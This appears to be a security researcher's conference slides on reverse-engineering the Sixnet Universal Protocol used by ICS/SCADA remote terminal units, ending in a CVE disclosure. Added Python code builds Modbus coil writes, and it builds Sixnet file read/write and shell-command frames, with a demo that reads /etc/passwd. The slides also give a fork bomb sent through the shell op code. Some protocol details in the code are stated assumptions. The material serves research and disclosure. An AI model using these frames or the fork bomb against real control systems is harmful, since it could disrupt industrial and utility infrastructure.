Sixnet Tools presentation Slight overview of ICS environment The Sixnet Universal Protocol
• Sixnet Tools presentation
• Slight overview of ICS environment
• The Sixnet Universal Protocol
• Fun stuff to do with it
Some:
• NextGen Firewalls
• Advanced Persistent Threat
• Cloud
• IPS/IDS 2.0
• MDM
• SaaS
• IaaS
• Google
About Me
• Doctoral Student
• Graduate Research Assistant at UofL
• Intelligent Systems Research Lab
• Bourbon Enthusiast
Sixnet Tools: For Poking at Sixnet Things
ICS: Industrial Control System
SCADA: Supervisory Control And Data Acquisition
SCADA Networks
[Diagram: Operator on HMI (Human Machine Interface) <-> RTU (Remote Terminal Unit) at a Substation; Sixnet I/O Toolkit]
Modbus op codes

Function type                         Function name                      Function code
Data access, bit access
  Physical Discrete Inputs            Read Discrete Inputs                2
  Internal Bits or Physical Coils     Read Coils                          1
                                      Write Single Coil                   5
                                      Write Multiple Coils               15
Data access, 16-bit access
  Physical Input Registers            Read Input Register                 4
  Internal Registers or               Read Holding Registers              3
  Physical Output Registers           Write Single Register               6
                                      Write Multiple Registers           16
                                      Read/Write Multiple Registers      23
                                      Mask Write Register                22
                                      Read FIFO Queue                    24
Data access, file record access       Read File Record                   20
                                      Write File Record                  21
Diagnostics                           Read Exception Status               7
                                      Diagnostic                          8
                                      Get Com Event Counter              11
                                      Get Com Event Log                  12
                                      Report Slave ID                    17
                                      Read Device Identification         43
Other                                 Encapsulated Interface Transport   43
Modbus Protocol (frame fields and their widths)
• Address 2
• Op code 2
• Data n
• Checksum 2
(In Modbus RTU the address and function code are one byte each and the frame ends with a 2-byte CRC-16; Modbus ASCII carries each of them as two hex characters and ends with a 2-character LRC.)
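To make the framing above concrete, here is a small Modbus RTU encoder/decoder. This is an added example, not code from the presentation or from the my-sixnet-tools project; it uses the CRC-16/MODBUS algorithm (init 0xFFFF, reflected polynomial 0xA001, CRC appended low byte first) and the function codes from the table above. The coil reply at the bottom is constructed for illustration.

```python
import struct

# Function codes taken from the Modbus table above (the subset used here).
FC_READ_COILS = 1
FC_WRITE_SINGLE_COIL = 5
FC_WRITE_MULTIPLE_COILS = 15


def crc16_modbus(data: bytes) -> int:
    """CRC-16/MODBUS: init 0xFFFF, reflected poly 0xA001, no final XOR."""
    crc = 0xFFFF
    for byte in data:
        crc ^= byte
        for _ in range(8):
            if crc & 1:
                crc = (crc >> 1) ^ 0xA001
            else:
                crc >>= 1
    return crc


def build_rtu(address: int, function: int, payload: bytes) -> bytes:
    """Address (1) | function (1) | data (n) | CRC (2, low byte first)."""
    body = bytes([address, function]) + payload
    return body + struct.pack("<H", crc16_modbus(body))


def parse_rtu(frame: bytes) -> tuple:
    """Check the trailing CRC and split the frame; raises on a corrupt frame."""
    if len(frame) < 4:
        raise ValueError("frame too short")
    body, (crc,) = frame[:-2], struct.unpack("<H", frame[-2:])
    if crc16_modbus(body) != crc:
        raise ValueError("CRC mismatch")
    return body[0], body[1], body[2:]


def read_coils(address: int, start: int, count: int) -> bytes:
    # FC 1 request data: starting address (2, big-endian), quantity (2).
    return build_rtu(address, FC_READ_COILS, struct.pack(">HH", start, count))


def write_single_coil(address: int, coil: int, on: bool) -> bytes:
    # FC 5 request data: coil address (2), then 0xFF00 = ON / 0x0000 = OFF.
    value = 0xFF00 if on else 0x0000
    return build_rtu(address, FC_WRITE_SINGLE_COIL, struct.pack(">HH", coil, value))


def write_multiple_coils(address: int, start: int, bits: list) -> bytes:
    # FC 15 request data: start (2), quantity (2), byte count (1), bits packed LSB-first.
    nbytes = (len(bits) + 7) // 8
    packed = bytearray(nbytes)
    for i, bit in enumerate(bits):
        if bit:
            packed[i // 8] |= 1 << (i % 8)
    data = struct.pack(">HHB", start, len(bits), nbytes) + bytes(packed)
    return build_rtu(address, FC_WRITE_MULTIPLE_COILS, data)


def decode_coil_response(frame: bytes) -> list:
    """FC 1 response data: byte count (1) then packed coil bits, LSB = first coil.
    A function code with bit 7 set is a Modbus exception response."""
    _, function, data = parse_rtu(frame)
    if function & 0x80:
        raise ValueError("exception response, code %d" % data[0])
    count = data[0]
    bits = []
    for byte in data[1:1 + count]:
        bits.extend(bool(byte >> i & 1) for i in range(8))
    return bits


if __name__ == "__main__":
    print(read_coils(1, 0, 8).hex(" "))
    # Constructed slave reply for illustration: 8 coils, pattern 0b10100101.
    reply = build_rtu(1, FC_READ_COILS, bytes([1, 0b10100101]))
    print(decode_coil_response(reply))
```

Nothing in the frame identifies or authenticates the sender: a valid address, function code and CRC is all a write request needs, which is the point the next slide is driving at.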
Problem?
Sixnet Universal Protocol (frame fields and their widths in bytes)
• Lead 1
• Length 1
• Destination 1
• Source 1
• Session 1
• Sequence 1
• Op Code 1
• Data n
• CRC 2
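A builder and parser for the frame layout above, added here as an example and not code from the talk or from my-sixnet-tools. The slide gives only field widths, so three things are assumptions: the value of the lead byte, that the length byte counts everything from Destination through the end of Data, and the CRC polynomial (the standard library's CRC-16/XMODEM stands in for whatever the real devices use). The Conversation class assumes the sequence byte increments per request.

```python
import binascii
import struct

# Assumed lead byte value; the slide gives the field width only.
LEAD = 0x55


def sixnet_crc(data: bytes) -> int:
    """Placeholder for the 2-byte CRC. The polynomial is not given on the
    slide, so CRC-16/XMODEM (binascii.crc_hqx, init 0) stands in (assumption)."""
    return binascii.crc_hqx(data, 0)


def build_frame(dst: int, src: int, session: int, seq: int, opcode: int, data: bytes) -> bytes:
    """Lead(1) Length(1) Dst(1) Src(1) Session(1) Seq(1) OpCode(1) Data(n) CRC(2).
    Assumed: Length counts Dst..Data (5 header bytes + data), CRC covers all
    preceding bytes and is sent big-endian."""
    if len(data) > 255 - 5:
        raise ValueError("data too long for a 1-byte length field")
    header = struct.pack("BBBBBBB", LEAD, 5 + len(data), dst, src, session, seq, opcode)
    body = header + data
    return body + struct.pack(">H", sixnet_crc(body))


def parse_frame(frame: bytes) -> dict:
    """Validate lead, length and CRC, then split the frame into its fields."""
    if len(frame) < 9 or frame[0] != LEAD:
        raise ValueError("not a frame")
    _, length, dst, src, session, seq, opcode = struct.unpack("BBBBBBB", frame[:7])
    if length != len(frame) - 4:          # lead + length byte + CRC are outside Length
        raise ValueError("length field does not match frame size")
    body, (crc,) = frame[:-2], struct.unpack(">H", frame[-2:])
    if sixnet_crc(body) != crc:
        raise ValueError("CRC mismatch")
    return {"dst": dst, "src": src, "session": session, "seq": seq,
            "opcode": opcode, "data": frame[7:-2]}


class Conversation:
    """Tracks the session and sequence bytes across requests to one RTU
    (assumed: sequence starts at 0, increments per request, wraps at 255)."""

    def __init__(self, dst: int, src: int, session: int):
        self.dst, self.src, self.session = dst, src, session
        self.seq = 0

    def request(self, opcode: int, data: bytes) -> bytes:
        frame = build_frame(self.dst, self.src, self.session, self.seq, opcode, data)
        self.seq = (self.seq + 1) & 0xFF
        return frame


if __name__ == "__main__":
    conv = Conversation(dst=0x01, src=0x02, session=0x10)
    # Constructed request: op code 0x1A with an arbitrary data field.
    frame = conv.request(0x1A, b"\x06\x05")
    print(frame.hex(" "))
    print(parse_frame(frame))
```

The header fields are all a single byte, so a sniffed session/sequence pair is trivial to continue or replay; the parser above only checks that a frame is well-formed, which is all the protocol itself checks.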
Reversing
Blinkenlights
Telnet, FTP
Get File Descriptor (request)
• Op Code 1a
• Data 00:03:00:[file path]:00 (open for read)
       03:03:[4-byte file size]:[file path]:00 (open for write)
Get File Descriptor (response)
• Op Code 01
• Data [FD]
File manipulation (request)
• Op Code 1a
• Data 06:[FD] (read)
       02:[FD]:[4B start]:[2B length]:[data] (write)
File manipulation (response)
• Op Code 01
• Data [FD]:[start]:[length]:[data] (read)
       00:[FD] (write)
MORE SNIFFING!
Shell Commands
• Request: Op Code d0, Data 1e:01:00:[command]:00
• Response: Op Code 01, Data 00:[length]:[output]
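Encoders for the request data fields and decoders for the response data fields of the file-descriptor, file-manipulation and shell-command op codes laid out above. This is an added example, not the presenter's tool; it builds only the Data field, to be wrapped in whatever frame builder is used. Widths the slides leave unstated are assumptions: the FD is one byte, the start offset and length in a read response match the 4-byte/2-byte write request, integers are big-endian, and the shell output length is two bytes.

```python
import struct

# Op codes from the slides.
OP_FILE = 0x1A       # get-file-descriptor and file-manipulation requests
OP_SHELL = 0xD0      # shell command request
OP_RESPONSE = 0x01   # response to any of the above


def fd_open_read(path: str) -> bytes:
    """Get File Descriptor, read: 00:03:00:[file path]:00"""
    return b"\x00\x03\x00" + path.encode() + b"\x00"


def fd_open_write(path: str, size: int) -> bytes:
    """Get File Descriptor, write: 03:03:[4-byte file size]:[file path]:00"""
    return b"\x03\x03" + struct.pack(">I", size) + path.encode() + b"\x00"


def parse_fd_response(data: bytes) -> int:
    """Response data [FD]; assumed to be a single byte."""
    if len(data) != 1:
        raise ValueError("unexpected FD response length")
    return data[0]


def file_read(fd: int) -> bytes:
    """File manipulation, read: 06:[FD]"""
    return bytes([0x06, fd])


def file_write(fd: int, start: int, chunk: bytes) -> bytes:
    """File manipulation, write: 02:[FD]:[4B start]:[2B length]:[data]"""
    if len(chunk) > 0xFFFF:
        raise ValueError("chunk too long for a 2-byte length")
    return bytes([0x02, fd]) + struct.pack(">IH", start, len(chunk)) + chunk


def parse_file_read_response(data: bytes) -> tuple:
    """Read response: [FD]:[start]:[length]:[data]; widths as assumed above."""
    if len(data) < 7:
        raise ValueError("read response too short")
    fd, start, length = struct.unpack(">BIH", data[:7])
    payload = data[7:]
    if len(payload) != length:
        raise ValueError("length field does not match payload")
    return fd, start, payload


def parse_file_write_response(data: bytes) -> int:
    """Write response: 00:[FD]"""
    if len(data) != 2 or data[0] != 0x00:
        raise ValueError("unexpected write response")
    return data[1]


def shell_command(cmd: str) -> bytes:
    """Shell command request: 1e:01:00:[command]:00"""
    return b"\x1e\x01\x00" + cmd.encode() + b"\x00"


def parse_shell_response(data: bytes) -> bytes:
    """Shell command response: 00:[length]:[output]"""
    if len(data) < 3:
        raise ValueError("shell response too short")
    status, length = struct.unpack(">BH", data[:3])
    if status != 0x00:
        raise ValueError("non-zero status byte")
    output = data[3:3 + length]
    if len(output) != length:
        raise ValueError("length field does not match output")
    return output


if __name__ == "__main__":
    # Constructed exchange: open a file for reading, read it, run a command.
    print(fd_open_read("/etc/passwd").hex(":"))
    print(file_read(parse_fd_response(b"\x05")).hex(":"))
    print(shell_command("id").hex(":"))
    print(parse_shell_response(b"\x00\x00\x05uid=0"))
```

Note what the request data does not contain: no credential, no token, no per-session secret. A path or a command string is the whole authorisation, so the "pseudo-shell" that follows needs nothing beyond the ability to put frames on the wire.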
Pseudo-Shell
Fork Bomb (sent through the shell-command op code)
BOOM! BOOM! BOOM!
p(){ p|p& }; p
Reporting
• CVE-2013-2802
• Sixnet firmware 4.8
• Read coils
• Write coils
• Read file system
• Write file system
• Administrative access to the OS
QUESTIONS?
Intelligent Systems Research Lab
University of Louisville
https://code.google.com/p/my-sixnet-tools/
Mehdi [email protected]